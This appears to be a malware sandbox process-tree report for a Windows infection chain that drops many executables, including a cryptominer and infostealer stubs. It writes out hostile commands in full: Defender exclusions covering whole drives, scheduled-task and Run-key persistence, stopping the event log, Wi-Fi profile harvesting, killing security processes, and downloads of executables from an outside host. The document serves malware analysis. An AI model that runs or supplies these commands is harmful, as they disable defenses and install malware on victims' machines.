- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost1.exe  "C:\Users\Admin\AppData\Local\Temp\Files\svchost1.exe"  2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Files\am.exe  "C:\Users\Admin\AppData\Local\Temp\Files\am.exe"  2⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\i.exe  "C:\Users\Admin\AppData\Local\Temp\Files\i.exe"  2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe  "C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"  2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe  "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe"  2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"  2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'A_second_wind_for_important_cases';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'A_second_wind_for_important_cases' -Value '"C:\Users\Admin\AppData\Local\A_second_wind_for_important_cases\A_second_wind_for_important_cases.exe"' -PropertyType 'String'  3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\minuscrypt_crypted.exe  "C:\Users\Admin\AppData\Local\Temp\Files\minuscrypt_crypted.exe"  2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"  3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 496  3⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\first.exe  "C:\Users\Admin\AppData\Local\Temp\Files\first.exe"  2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\baseline.exe  "C:\Users\Admin\AppData\Local\Temp\Files\baseline.exe"  2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\alex.exe  "C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"  2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"  3⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe  "C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe"  4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\f60f0ba310\qemu-ga.exe  "C:\Users\Admin\AppData\Local\Temp\f60f0ba310\qemu-ga.exe"  5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe  "C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe"  4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"  4⤵
-
C:\Windows\SysWOW64\choice.exe  choice /C Y /N /D Y /T 3  5⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe  "C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"  2⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
C:\Windows\SYSTEM32\cmd.exe  "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"  3⤵
-
C:\Windows\system32\chcp.com  chcp 65001  4⤵
-
C:\Windows\system32\netsh.exe  netsh wlan show profiles  4⤵
-
C:\Windows\system32\findstr.exe  findstr /R /C:"[ ]:[ ]"  4⤵
-
C:\Windows\SYSTEM32\cmd.exe  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"  3⤵
-
C:\Windows\System32\cmd.exe  "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"  3⤵
-
C:\Windows\system32\chcp.com  chcp 65001  4⤵
-
C:\Windows\system32\timeout.exe  timeout /t 3  4⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\Files\Machinegggg.exe  "C:\Users\Admin\AppData\Local\Temp\Files\Machinegggg.exe"  2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"  3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_lXNcTC.exe  "C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_lXNcTC.exe"  2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe  C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe  3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe  "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"  2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 14403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\Files\lada.exe"C:\Users\Admin\AppData\Local\Temp\Files\lada.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Files\XMRig.exe"C:\Users\Admin\AppData\Local\Temp\Files\XMRig.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "ACULXOBT"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "ACULXOBT" binpath= "C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "ACULXOBT"3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe"C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 73003⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe9⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"10⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe11⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"12⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe13⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"14⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe15⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"16⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe17⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"18⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe19⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"20⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe21⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"22⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe23⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe25⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"26⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe27⤵
- Drops file in Windows directory
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXE"2⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXE3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"4⤵
- Blocklisted process makes network request
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\Temp\tel.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\Temp\tel.exeC:\Windows\Temp\tel.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1566⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\Temp\fcc.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\Temp\fcc.exeC:\Windows\Temp\fcc.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\Temp\jjj.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\Temp\jjj.exeC:\Windows\Temp\jjj.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 2406⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1332 -ip 13321⤵
-
C:\DriverHostCrtNet\comSvc.exe"C:\DriverHostCrtNet\comSvc.exe"1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6bOuYaabJ9.bat"2⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵
-
C:\DriverHostCrtNet\4363463463464363463463463.exe"C:\DriverHostCrtNet\4363463463464363463463463.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae9414f3-5cc8-4ee3-b156-8e00e0d505c5.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5feb41f3-71ea-4ee5-8080-cc28895b2a1d.vbs"4⤵
-
C:\DriverHostCrtNet\4363463463464363463463463.exeC:\DriverHostCrtNet\4363463463464363463463463.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\odt\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4960 -ip 49601⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST1⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\odt\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\odt\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\odt\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriverHostCrtNet\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "networan" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\networa.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "networan" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\networa.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\Users.exeusers.exe2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "3⤵
- Checks computer location settings
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 64⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz2.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im safesurf.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im surfguard.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/ASUFUSER.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f4⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f4⤵
- Modifies registry key
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvidsrv.exe4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\reg.exereg delete "hkcu\software\microsoft\windows\currentversion" /v "alg" /f4⤵
-
C:\Windows\SysWOW64\find.exefind "svr.vbs"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exeREG QUERY hkcu\software\microsoft\windows\currentversion4⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/raauser.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Macromedia\nobuf.vbs"4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/amsql.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/prochack.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 204⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\JetSwap /f4⤵
- Modifies registry key
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 32⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe C:\Users\Admin\AppData\Roaming\Macromedia2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "networa" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\networa.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 11⤵
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'1⤵
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/app.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\chcp.comCHCP 12511⤵
-
